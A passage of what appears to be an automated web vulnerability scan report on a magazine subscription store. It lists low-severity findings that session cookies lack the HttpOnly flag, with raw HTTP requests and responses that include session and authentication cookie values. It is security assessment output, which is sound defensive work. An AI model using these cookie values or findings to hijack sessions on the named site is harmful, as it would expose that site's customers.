Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Brides

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Brides HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00004nur2b4AB8GyjoBhBXHJFNN:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:39 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Za%0aN8I5U1fIm%2bVXFNkHZc7mzEyRNk9R93bc3Z%2bj3WRLr%2f%2fLUA4vR9PWa%2b%2fqrTv2%2bGU%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419602%3atrue%3afalse%3a0%3aA5S73L%2bBXNF58pGv%2flPBhYu4lts%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29610


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.8. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastPortfolio HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:13 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000MTLmULOAO5VhhPygy4Acrs9:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:52 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.9. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_CondeNastTraveler HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:14 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000DEGztK4KuU8jzcAvA-zQ_sb:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:54 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YF%0a57LJD52VFrIOn1bSX%2fQv09%2bRP8hqpL9gI8glNNCvaGm3LmA3Rod42Mm2tHMtlbM%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419613%3atrue%3afalse%3a0%3aRsNgMu8ZswVr2yV3hDnh86UdQV4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30231


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.10. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Details  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Details

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Details HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:07 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000zj5CriHITh3Pg1Mh5DZbRfE:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:59 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YS%0ao3Xdx2qkaVDxuC3UboHigZndhxzkaCnU0SpqoYzOdQi9%2byvcsP9hI3YzV%2bKI6%2bA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419618%3atrue%3afalse%3a0%3aWmgETUm9LlNs4rLQTSOMj7IzaB0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27507


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.11. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ElegantBride  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ElegantBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ElegantBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:45:24 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00003mw4fmwQBidF23NiJkaoStU:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:04 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.12. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GQ  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GQ

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GQ HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:58 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000K8AjziO3qYOdmYpv17Si2wk:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:38 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YY%0a3oIHkEKIKs9o38uGG7kfp27zsKCrzdwCfVBZPklGPhUU1l2AYQ5kNDxv1fiDpfo%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419713%3atrue%3afalse%3a0%3aoNunPdPRwDso5BWF0B3DMK%2b7aGY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29732


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.13. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Glamour  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Glamour

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Glamour HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:15 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000k9muvhPT2T0QGomWys1qLJF:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:54:55 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yx%0a6YXYjEo1VspU94VyYifd4b8UwcK0sAJJnDw3uxHAP2B5jfTIt7CKmPmh5LMseU4%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419654%3atrue%3afalse%3a0%3ayk4TdxcyqY8lQetDPXzNMpgXQ3Y%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29760


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.14. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfDigest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:39 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000LLoThJrjtgp0dh9gD0ACop5:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:18 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0Yv%0a6v0E%2bm809ThIzM6ea0oI8DywHeBeNGHjSsQGCNvkAgdRmcAW%2bzbsZ%2fEpEkjt6yQ%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419689%3atrue%3afalse%3a0%3aYVf%2b5P0tc2ehV12Qvasx9%2fLJ0y0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27700


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.15. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_GolfWorld  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_GolfWorld

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_GolfWorld HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:46:48 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000IM4ZETA2C7Q0vENBBHplaqH:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:55:28 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0a8%0abtVlN3ZfToACmNCXnTZXNhHTUY5Da6by4HMXYXoBCmw4ZHIQ7kDdaGdpNFW9q8k%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419703%3atrue%3afalse%3a0%3auJNeEFkCmLdxXCBhFMbGZFgwsxY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 27910


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.16. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Lucky  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Lucky

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Lucky HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000rGo_qi4_LyyOG_1Dh4EcyqB:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:30 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCn%0aiwEK5mViBuug9h0Y9DHXOJ%2bFWWhqJ9zjJa36rFzEOjK7ezVaLZk6%2fmoed8gyVq0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420067%3atrue%3afalse%3a0%3ahpXIcrDhid5NuOwuZh%2ft4lVsrDY%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29740


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.17. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ModernBride  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ModernBride

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ModernBride HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:47:44 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000EbGXc6gG6JG7do0YUFhxuVM:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:56:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 350


<!-- JSP File Name: Stores.war/GenericSystemError.jsp -->


       <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<head>
   <title>Generic System Error Test JSP (Item)
...[SNIP]...

11.18. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_NewYorker  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_NewYorker

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_NewYorker HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:48:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000qk0-9EmVZgM9368A8xyvtbj:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:57:46 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fA%2f%0abexFhWTt47e5Mo%2bIUOGLFoXFbZibHImhZP%2fX9oVBOKGt8iW%2bkrypzCBA7zMsTD0%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420142%3atrue%3afalse%3a0%3a5E6ldLW5ZALO1tR0oYibLGxRpq0%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 30082


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.19. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Self  previous  next

Summary

Severity:   Low
